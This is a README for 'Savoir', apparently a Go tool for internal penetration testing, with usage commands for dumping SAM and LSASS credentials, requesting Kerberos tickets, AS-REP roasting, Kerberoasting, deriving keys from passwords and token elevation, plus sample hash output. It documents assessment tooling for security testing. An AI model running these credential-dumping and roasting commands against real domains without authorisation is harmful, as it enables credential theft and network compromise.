Savoir - A tool to perform tasks during internal security assessment

Savoir

Savoir is a tool to perform tasks during internal security assessment. This project help me to understand how some pentest tools works.

Build

You can build savoir for multiple platforms:

make update
make build

The build folder contains build for multiple OS and architectures.

Commands

sam

savoir sam local # Windows only
savoir sam hive --sam <path/to/sam> --system <path/to/system>
savoir sam shadowcopies # Windows only

lsass

savoir lsass process --json # Windows only
savoir lsass minidump --path /path/to/lsass.dmp --json

kerberos

Ask a TGT then a TGS

You can also ask a TGS, savoir will ask for a TGT first

savoir kerberos asktgs --dc-ip <DC-IP> -d ubh.lab -u dany -p dany -e rc4 -r karen
$krb5tgs$23$*karen$UBH.LAB$ubh.lab/karen*$858129adc693b1a8bb62e50a51b4ffc2$9b2b...

You can ask a TGT save it to a kirbi files then ask for a TGS:

# Ask a TGT and save it to dany.kirbi
savoir kerberos asktgt --dc-ip <DC-IP> -d ubh.lab -u dany -p dany -e rc4 -o dany.kirbi
TGT saved to dany.kirbi.

# Display the TGT
savoir kerberos describe --ticket dany.kirbi
ServiceName              :  krbtgt/ubh.lab
ServiceRealm             :  UBH.LAB
UserName                 :  dany
UserRealm                :  UBH.LAB
StartTime                :  2022-01-22 09:12:55 +0000 UTC
EndTime                  :  2022-01-22 19:12:55 +0000 UTC
RenewTill                :  2022-01-29 09:12:55 +0000 UTC
Flags                    :  forwardable ; proxiable ; renewable ; initial ; pre-authent
KeyType                  :  arcfour-hmac-md5
Base64(key)              :  9CrwY3aAdXdr91h7uGi9qg==

# Ask a TGS using this TGT
savoir kerberos asktgs --dc-ip <DC-IP> -d ubh.lab -t dany.kirbi -e rc4 -r karen
$krb5tgs$23$*karen$UBH.LAB$ubh.lab/karen*$ef59ed1f3fdfddf356dd93823ad8208f$228920...

Generate Kerberos keys

Note that RC4 key is the NTLM hash (MD4(UNICODE(password)))

savoir kerberos keys --password 'Pa$$w0rd' --salt 'CONTOSO.COMAdministrator'
arcfour-hmac-md5
  Key: 92937945b518814341de3f726500d4ff
  Iterations: 00001000

aes128-cts-hmac-sha1-96
  Key: bd75e98362b16649ffbaed630d5341d0
  Iterations: 00001000

aes256-cts-hmac-sha1-96
  Key: 660e61042b190b5724c62bb473facca12058fb9ad3c03c0d2809f839c0352502
  Iterations: 00001000

AS-REP roasting

A User account may have the option Do not require Kerberos preauthentication checked.

savoir kerberos asktgt --dc-ip <DOMAIN_IP> -d <DOMAIN> -u <USERNAME> -p <USER_PASSWORD> -e rc4 --format=john

Kerberoasing

savoir kerberos asktgs --dc-ip <DOMAIN_IP> -d <DOMAIN> -u <USERNAME> -p <USER_PASSWORD> -e rc4 -r <TARGET_USER>

token

savoir token elevate -x cmd.exe # Windows only

webscreenshot

This command take a screenshot of a URL using a headless browser.

savoir webscreenshot --url {url} --renderer {chrome|chromium|firefox} --renderer-path {path}

Credits

Similar Resources

Nebula Operator manages NebulaGraph clusters on Kubernetes and automates tasks related to operating a NebulaGraph cluster

Nebula Operator manages NebulaGraph clusters on Kubernetes and automates tasks related to operating a NebulaGraph cluster. It evolved from NebulaGraph Cloud Service, makes NebulaGraph a truly cloud-native database.

Dec 31, 2022

Terraform provider to help with various AWS automation tasks (mostly all that stuff we cannot accomplish with the official AWS terraform provider)

Terraform provider to help with various AWS automation tasks (mostly all that stuff we cannot accomplish with the official AWS terraform provider)

terraform-provider-awsutils Terraform provider for performing various tasks that cannot be performed with the official AWS Terraform Provider from Has

Dec 8, 2022

Golang security checker

Golang security checker

gosec - Golang Security Checker Inspects source code for security problems by scanning the Go AST. License Licensed under the Apache License, Version

Jan 4, 2023

Hubble - Network, Service & Security Observability for Kubernetes using eBPF

Hubble - Network, Service & Security Observability for Kubernetes using eBPF

Network, Service & Security Observability for Kubernetes What is Hubble? Getting Started Features Service Dependency Graph Metrics & Monitoring Flow V

Jan 2, 2023

Dynamic Application Security Testing (DAST) for Cloud

Dynamic Application Security Testing (DAST) for Cloud

Dynamic Application Security Testing (DAST) for Cloud Probr analyzes the complex behaviours and interactions in your cloud resources to enable enginee

Dec 15, 2022

Open Source runtime scanner for Linux containers (LXD), It performs security audit checks based on CIS Linux containers Benchmark specification

Open Source runtime scanner for Linux containers (LXD), It performs security audit checks based on CIS Linux containers  Benchmark specification

lxd-probe Scan your Linux container runtime !! Lxd-Probe is an open source audit scanner who perform audit check on a linux container manager and outp

Dec 26, 2022

Kubernetes Pod Security Standards implementation

Pod Security Admission The Pod Security Standards are a set of best-practice profiles for running pods securely. This repository contains the codified

Dec 30, 2022

GitHub App to set and enforce security policies

Allstar Allstar is a GitHub App installed on organizations or repositories to set and enforce security policies. Its goal is to be able to continuousl

Jan 5, 2023

A golang CTF competition platform with high-performance, security and low hardware requirements.

A golang CTF competition platform with high-performance, security and low hardware requirements.

CTFgo - CTF Platform written in Golang A golang CTF competition platform with high-performance, security and low hardware requirements. Live Demo • Di

Oct 20, 2022
Open Source runtime scanner for OpenShift cluster and perform security audit checks based on CIS RedHat OpenShift Benchmark specification
Open Source runtime scanner for OpenShift cluster and perform security audit checks based on CIS RedHat OpenShift Benchmark specification

OpenShift-Ordeal Scan your Openshift cluster !! OpenShift-Ordeal is an open source audit scanner who perform audit check on OpenShift Cluster and outp

Sep 6, 2022
Kubei is a flexible Kubernetes runtime scanner, scanning images of worker and Kubernetes nodes providing accurate vulnerabilities assessment, for more information checkout:
Kubei is a flexible Kubernetes runtime scanner, scanning images of worker and Kubernetes nodes providing accurate vulnerabilities assessment, for more information checkout:

Kubei is a vulnerabilities scanning and CIS Docker benchmark tool that allows users to get an accurate and immediate risk assessment of their kubernet

Dec 30, 2022
This is Reperio Health's GoLang backend assessment

reperio-backend-assessment This is Reperio Health's GoLang backend assessment. N

Dec 22, 2021
Operator Permissions Advisor is a CLI tool that will take a catalog image and statically parse it to determine what permissions an Operator will request of OLM during an install

Operator Permissions Advisor is a CLI tool that will take a catalog image and statically parse it to determine what permissions an Operator will request of OLM during an install. The permissions are aggregated from the following sources:

Apr 22, 2022
Testcontainers is a Golang library that providing a friendly API to run Docker container. It is designed to create runtime environment to use during your automatic tests.

When I was working on a Zipkin PR I discovered a nice Java library called Testcontainers. It provides an easy and clean API over the go docker sdk to

Jan 7, 2023
Andrews-monitor - A Go program to monitor when times were available to order for Brown's Andrews dining hall. Used during the portion of the pandemic when the dining hall was only available for online order.

Andrews Dining Hall Monitor A Go program to monitor when times were available to order for Brown's Andrews dining hall. Used during the portion of the

Jan 1, 2022
Package trn introduces a Range type with useful methods to perform complex operations over time ranges

Time Ranges Package trn introduces a Range type with useful methods to perform c

Aug 18, 2022
Cloud-Z gathers information and perform benchmarks on cloud instances in multiple cloud providers.

Cloud-Z Cloud-Z gathers information and perform benchmarks on cloud instances in multiple cloud providers. Cloud type, instance id, and type CPU infor

Jun 8, 2022
A tool to automate some of my tasks in ECS/ECR.

severinoctl A tool to automate some tasks in ECS/ECR. Work in progress... Prerequisites awscli working aws credentials environment AWS_REGION exported

Feb 19, 2022
Vilicus is an open source tool that orchestrates security scans of container images(docker/oci) and centralizes all results into a database for further analysis and metrics.
Vilicus is an open source tool that orchestrates security scans of container images(docker/oci) and centralizes all results into a database for further analysis and metrics.

Vilicus Table of Contents Overview How does it work? Architecture Development Run deployment manually Usage Example of analysis Overview Vilicus is an

Dec 6, 2022